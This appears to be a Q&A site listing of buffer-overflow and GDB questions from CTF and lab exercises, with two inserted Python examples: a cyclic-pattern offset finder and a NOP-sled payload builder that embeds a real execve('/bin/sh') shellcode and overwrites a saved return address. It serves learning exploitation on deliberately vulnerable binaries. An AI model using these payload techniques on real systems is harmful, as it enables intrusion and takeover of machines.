All Questions
Tagged with gdb buffer-overflow
15 questions
0 votes, 0 answers, 736 views
Using GDB to find the address of a buffer in a stripped C binary
I am working with a crackmes binary called Simple Overflow. It has two buffers with sizes 0x10 and 0x8, and it uses malloc to allocate two contiguous memory blocks (see <+25> and <+39> on ...
2 votes, 2 answers, 492 views
How can I recognize the length of this array based on the assembly instruction?
In the source code I can clearly see that the array called "buf" is 32 bytes long, since 1 char = 1 byte.
I assume that the array starts at the address [rbp-0x30] and the argv[ ] is stored in ...
1 vote, 1 answer, 882 views
How can I get my shellcode to work outside of GDB?
I'm working inside a Warzone VM with no ASLR or NX bit. The program I'm trying to exploit is really simple:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
* compiled ...
3 votes, 1 answer, 327 views
Why EIP is being overwritten before local buffer ends?
I am doing a simple buffer overflow exercise, here is the source:
//vuln.c
#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[]) {
char buf[256];
strcpy(buf,argv[...
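Added example, not code from the question above: the usual way to answer "how far past buf does the saved EIP sit?" is to overflow with a cyclic pattern in which every 4-byte window is unique, then map the value gdb shows in EIP back to an offset. On x86-64 the `ret` faults on a non-canonical address before the pattern reaches RIP, so the quadword is read from `$rsp` instead; the `width=8` path covers that. The alphabet, the pattern construction (the same De Bruijn scheme pwntools' cyclic() uses) and the crash values in the usage are assumptions of this example, not from the question.

```python
"""Cyclic-pattern helper for locating the saved-return-address offset.

Added example; not code from the question or from any tool it mentions.
Assumes a little-endian x86/x86-64 target and that the crash value is
copied from the debugger as an integer (`info registers eip`, `x/gx $rsp`).
"""
import string
import struct

ALPHABET = string.ascii_lowercase  # 26 symbols; with n=4 that is 26**4 unique windows


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield a De Bruijn sequence B(k, n) one symbol at a time (FKM algorithm).

    Every length-n substring occurs exactly once, so any n bytes read back
    from a crashed register map to a single offset in the pattern.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """Return the first `length` bytes of the pattern, to feed to the target."""
    out = bytearray()
    for ch in de_bruijn(n=n):
        if len(out) >= length:
            break
        out.append(ord(ch))
    return bytes(out)


def cyclic_find(value, width=4, n=4, max_length=8192):
    """Map a crash value back to its offset in the pattern, or -1 if absent.

    `value` is the integer the debugger showed; `width` is 4 for EIP on x86,
    8 for a quadword read from $rsp on x86-64. Packing little-endian restores
    the byte order the pattern had in memory. `max_length` bounds the search
    to payloads of that size (raise it if you sent a longer pattern).
    """
    needle = struct.pack("<I" if width == 4 else "<Q", value)
    return cyclic(max_length, n=n).find(needle)


if __name__ == "__main__":
    # Constructed usage: send cyclic(300) as argv[1], crash, read EIP in gdb.
    print(cyclic(40))
    print(cyclic_find(0x61616166))       # EIP = 0x61616166 ("faaa") -> 20
    sample = cyclic(300)
    quad = int.from_bytes(sample[100:108], "little")
    print(cyclic_find(quad, width=8))    # -> 100
```

Typical round trip in gdb: `run $(python3 -c 'import sys; sys.stdout.buffer.write(cyclic(300))')`, then `info registers eip` and `cyclic_find(<that value>)`; the result is the number of bytes to write before the 4 (or 8) bytes that become the return address, whatever padding the compiler put between buf and the saved frame.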
1 vote, 0 answers, 841 views
Illegal instruction fault in stack based buffer overflow
I wrote this short C program to practice buffer overflow exploits:
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <inttypes.h>
char *decode(char *s){
...
2 votes, 1 answer, 459 views
ROP chain: Buffer Overflow Return Pointer
I am trying to get a ROP exploit to work on Ubuntu 18.04 LTS 64bit.
I have a 64-bit binary (NX enabled, ASLR disabled) with a vuln function as follows:
public vuln
vuln proc near
var_100= byte ptr -...
3 votes, 1 answer, 928 views
Why do we need to know the address of shellcode?
I have read many articles regarding the buffer overflow exploit. Everywhere it's written as follows.
"It's difficult to know the starting address of the shellcode"
Why do we need to know the address ...
3 votes, 1 answer, 942 views
Buffer overflow challenge - shell not opening
I'm working on a buffer overflow CTF challenge. The binary for this challenge includes a give_shell function (they cover shellcode in the next challenge)
I can successfully overwrite the saved EIP on ...
1 vote, 0 answers, 353 views
Stack buffer overflow SIGSEGV help
I've been going at this for a couple of days now, working through trial and error, but I can't seem to pinpoint exactly why I'm still getting a SIGSEGV.
Here's the stdout of me stepping through the ...
1 vote, 1 answer, 845 views
Buffer overflow on server
I have a server (for reference: pastebin.com/ghJX69uH) that I can netcat to and it will ask to input a message.
I know it is vulnerable to buffer overflow, but I can't seem to get the shellcode to ...
6 votes, 3 answers, 18k views
How to effectively bypass GCC stack smashing detection
I was solving the bof challenge on http://pwnable.kr/play.php
It is required to smash the stack of the following code
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void ...
0 votes, 1 answer, 384 views
buffer overflow-seg fault
I am trying to overflow a buffer, which has a size of 0x201 bytes, and get a shellcode. In the program that contains the buffer, there is a call to ptrace() (on itself), therefore the shellcode I'm using ...
2 votes, 1 answer, 15k views
Problem finding return address for shellcode
Howdy guys and ghouls,
I've got a classic b0f; in fact, it's the protostar stack5 exercise
link to stack5 code
Now I have the buffer + shellcode running up to overwriting EIP and I need to provide ...
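Added example serving both "Why do we need to know the address of shellcode?" and "Problem finding return address for shellcode" above; it is not code from either question or from protostar. After `ret`, the CPU starts executing at whatever address replaced the saved EIP, so that value must point at the shellcode's first byte: with no sled there is exactly one address that works, and a run of NOPs in front of the shellcode widens the target to every byte of the sled, which is what makes a guessed or slightly-off address survivable on a no-ASLR, no-NX target. `buf_addr`, `ret_offset` and the sled size are constructed values for illustration; the shellcode bytes are the classic 23-byte Linux x86 execve("/bin/sh") stub, used here only as a byte string and never executed.

```python
"""NOP-sled payload layout for a classic 32-bit stack overflow.

Added example, not code from either question. Assumes a no-NX, no-ASLR
target, a saved return address `ret_offset` bytes past the start of the
overflowed buffer (found with a cyclic pattern or in gdb), and that the
buffer sits at `buf_addr`. Nothing is executed: the landing check only
models the CPU running NOPs until it reaches a non-NOP byte.
"""
import struct

NOP = 0x90
# Classic 23-byte Linux x86 execve("/bin/sh") stub, used as an opaque byte string.
SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")


def build_payload(shellcode, ret_offset, ret_addr, sled_len=0, filler=b"A"):
    """Lay out [NOP * sled_len][shellcode][filler][ret_addr, little-endian].

    The 4 bytes at ret_offset overwrite the saved EIP, so the payload is
    ret_offset + 4 bytes long.
    """
    body = bytes([NOP]) * sled_len + shellcode
    if len(body) > ret_offset:
        raise ValueError(f"sled+shellcode ({len(body)}) exceed ret_offset ({ret_offset})")
    return body + filler * (ret_offset - len(body)) + struct.pack("<I", ret_addr)


def lands_on_shellcode(payload, buf_addr, target, shellcode, sled_len):
    """True iff jumping to `target` executes only NOPs before the shellcode.

    Landing before the buffer, inside the shellcode (misaligned decode) or
    past it (filler / return address bytes) is treated as a crash.
    """
    start = target - buf_addr
    sc_start = sled_len
    if start < 0 or start > sc_start:
        return False
    if payload[sc_start:sc_start + len(shellcode)] != shellcode:
        return False
    return all(b == NOP for b in payload[start:sc_start])


def working_addresses(payload, buf_addr, shellcode, sled_len):
    """Count the distinct return-address values that reach the shellcode intact."""
    return sum(
        lands_on_shellcode(payload, buf_addr, buf_addr + i, shellcode, sled_len)
        for i in range(len(payload))
    )


if __name__ == "__main__":
    # Constructed values: buffer at 0xbffff5a0, saved EIP 76 bytes past it.
    base, ret_offset = 0xBFFFF5A0, 76
    exact = build_payload(SHELLCODE, ret_offset, base)
    sled = build_payload(SHELLCODE, ret_offset, base + 16, sled_len=32)
    print("no sled :", working_addresses(exact, base, SHELLCODE, 0), "usable address")
    print("32 NOPs :", working_addresses(sled, base, SHELLCODE, 32), "usable addresses")
    print("payload :", sled.hex())
```

The sled does not remove the need for an address; it only turns one exact value into a window of sled_len + 1 values. The window is still anchored to where the buffer actually lives, which is why a payload tuned under gdb (different environment size, different argv[0]) can miss once the same binary runs outside it.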
7 votes, 1 answer, 2k views
GDB Error "Too many array elements"
I'm trying to understand a very basic stack-based buffer overflow.
I'm running Debian wheezy on a x86_64 Macbook Pro.
I have the following unsafe program:
#include <stdlib.h>
#include <stdio.h&...
3 votes, 2 answers, 410 views
Why is this string on the stack not exactly the one I entered? [closed]
I was trying to understand buffer overflow attacks using the following C program
#include "stdio.h"
#include "string.h"
void iwontprint()
{
printf("i wont be printed!");
}
void ...